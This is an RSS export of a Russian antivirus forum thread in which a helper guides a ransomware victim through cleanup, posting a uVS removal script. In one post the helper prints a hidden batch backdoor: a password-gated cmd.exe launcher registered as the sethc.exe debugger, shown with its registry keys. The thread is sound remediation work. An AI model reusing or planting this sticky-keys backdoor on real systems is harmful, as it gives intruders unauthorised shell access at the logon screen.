Форум esetnod32.ru [тема: зашифровано с расширением *_dalailama2015@protonmail.ch] http://forum.esetnod32.ru Новое в теме зашифровано с расширением *_dalailama2015@protonmail.ch форума на сайте Форум esetnod32.ru [forum.esetnod32.ru] ru http://backend.userland.com/rss2 Fri, 01 May 2026 05:04:15 +0300 зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
Спасибо за уделенное время! Отправил письмо в support@esetnod32.ru.
15.12.2015 17:24:43, Вячеслав Захаров.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90079/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90079/ Tue, 15 Dec 2015 17:24:43 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
====code==== 

;uVS v3.86.7 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v385c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\DRM\SMSS.EXE
addsgn 98F41F2AC82A4C9A45FCAEB1DB5C120525013B1E2709E0870CA62D37A45F4F1ADC021FC77E5516073B0989AF8C5649713BDB4B4E9F9AB0A77B7F2D3A87CC6273 8 Win32/ServiceEx

zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\DRM\WA\SERVICES.EXE
addsgn 1A86B99A5583338CF42B627D339E9971019A77BAADEE9404A1CF4E7DDB07728A18E9B55F05AD92CB4383849F49AC6CA27C93E87326DD4388C460A72FC787DBF3 8 Win32/Packed.Autoit

zoo %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\DRM\WA\SERVICES.EXE
zoo %SystemRoot%\SYSWOW64\MTMONITOR\TMMT64.EXE
addsgn BA6F9BB2BD8154720B9C2D754C2124FBDA75303AC9A957FB69E38D37892964995917C3EE3F559D49A28526914716A1CB5FDFE83ADE1158FD3277A4ACFA882C72 8 Monitor.Win64.Mikpo.a [Kaspersky]

delref %SystemRoot%\SYSWOW64\NLS.BAT
;------------------------autoscript---------------------------

chklst
delvir

deldirex %SystemRoot%\SYSWOW64\MTMONITOR

deltmp
delnfr
;-------------------------------------------------------------
CZOO
restart
=============
перезагрузка, пишем о старых и новых проблемах.
------------
по расшифровке документов напишите в support@esetnod32.ru при наличие лицензии на антивирус ESET
15.12.2015 17:02:23, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90077/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90077/ Tue, 15 Dec 2015 17:02:23 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
нет тоже не мой
15.12.2015 16:32:44, Вячеслав Захаров.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90074/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90074/ Tue, 15 Dec 2015 16:32:44 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
а это ваш файл?

Полное имя                  C:\WINDOWS\SYSWOW64\NLS.BAT
Имя файла                   NLS.BAT
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
Удовлетворяет критериям    
IMAGE FILE EXECUTION.EXE    (ССЫЛКА ~ \IMAGE FILE EXECUTION OPTIONS\)(1)   OR   (ССЫЛКА ~ .EXE\DEBUGGER)(1) [auto (0)]
                           
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Размер                      163 байт
Создан                      08.12.2015 в 20:20:01
Изменен                     03.11.2015 в 21:07:29
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Тип запуска                 Неизвестный отладчик приложения(ий)
Атрибут файла               "Скрытый" или "Системный" [типично для вирусов]
                           
Доп. информация             на момент обновления списка
SHA1                        26075AC1C001707F43B6F9D56BEC4A612A1B53D6
MD5                         017894FF97D0A56126730FE33B0253F2
                           
#FILE#                      @ECHO OFF
:PASS
set/p "pass=>"
if NOT %pass%== gjitknsyf[eqgblfhfc goto FAIL
start cmd.exe
goto END
:FAIL
echo Invalid password
goto PASS
:END


378519
                           
Ссылки на объект            
Ссылка                      HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger
15.12.2015 16:14:53, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90072/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90072/ Tue, 15 Dec 2015 16:14:53 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
Нет я к сожалению даже не знаю что это такое. Этот сервер используется как файл хранилище, пользователи тоже не могли не чего установить так как не имеют к нему доступа кроме как расшаренным на нем ресурсам
15.12.2015 14:25:13, Вячеслав Захаров.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90071/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90071/ Tue, 15 Dec 2015 14:25:13 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
Вячеслав,
MPK сами ставили на сервер?
15.12.2015 14:15:04, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90069/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90069/ Tue, 15 Dec 2015 14:15:04 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
http://rghost.ru/7648Kdwyz
Зашифрованные файлы.rar
15.12.2015 13:54:06, Вячеслав Захаров.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90065/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90065/ Tue, 15 Dec 2015 13:54:06 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
добавьте образ автозапуска системы
http://forum.esetnod32.ru/forum9/topic2687/
+
1-2 два небольших зашифрованных файла.
15.12.2015 13:34:26, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90064/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90064/ Tue, 15 Dec 2015 13:34:26 +0300 Шифровальщики файлов и подбор дешифраторов зашифровано с расширением *_dalailama2015@protonmail.ch зашифровано с расширением *_dalailama2015@protonmail.ch возможно, Filecoder.DG в форуме Шифровальщики файлов и подбор дешифраторов.
Поймали шифровальщика dalailama2015@protonmail.ch помогите в расшифровке. Не знаю что нужно для расшифровки лицензия есть зашифрованные файлы тоже.
15.12.2015 13:28:54, Вячеслав Захаров.]]> http://forum.esetnod32.ru/messages/forum35/topic12758/message90063/ http://forum.esetnod32.ru/messages/forum35/topic12758/message90063/ Tue, 15 Dec 2015 13:28:54 +0300 Шифровальщики файлов и подбор дешифраторов